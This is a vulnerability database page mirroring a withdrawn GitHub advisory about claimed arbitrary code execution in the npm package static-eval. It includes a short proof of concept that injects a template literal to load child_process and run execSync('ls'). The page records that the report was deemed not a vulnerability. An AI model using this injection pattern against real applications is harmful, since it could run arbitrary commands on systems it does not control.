Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
githubGitHub Advisory DatabaseGHSA-8V27-2FG9-7H62
HistoryMay 06, 2021 - 4:11 p.m.

Withdrawn: Arbitrary Code Execution in static-eval

2021-05-0616:11:25
CWE-94
GitHub Advisory Database
github.com
30

0.002 Low

EPSS

Percentile

63.8%

JSON

All versions of package static-eval are vulnerable to Arbitrary Code Execution using FunctionExpressions and TemplateLiterals. PoC: var evaluate = require(‘static-eval’); var parse = require(‘esprima’).parse; var src=“(function (x) { return ${eval(“console.log(global.process.mainModule.constructor._load(‘child_process’).execSync(‘ls’).toString())”)} })()” var ast = parse(src).body[0].expression; evaluate(ast)

WITHDRAWN

This was deemed not a vulnerability. See this issue for details.

CPENameOperatorVersion
static-evalle2.1.0

Related

veracode 1
cve 1
ibm 2
veracode
veracode
Arbitrary Code Execution
2019-02-15 02:43:21
cve
cve
CVE-2021-23334
2021-02-11 12:15:00
ibm
ibm
Security Bulletin: A security vulnerability in Node.js lodash module affects IBM Cloud Pak for Multicloud Management Managed Service
2021-05-19 17:14:40
Security Bulletin: IBM Watson OpenScale on Cloud Pak for Data is impacted by Vulnerabilities in Node.js
2021-04-16 14:32:44

0.002 Low

EPSS

Percentile

63.8%

JSON
Related for GHSA-8V27-2FG9-7H62
veracode1cve1ibm2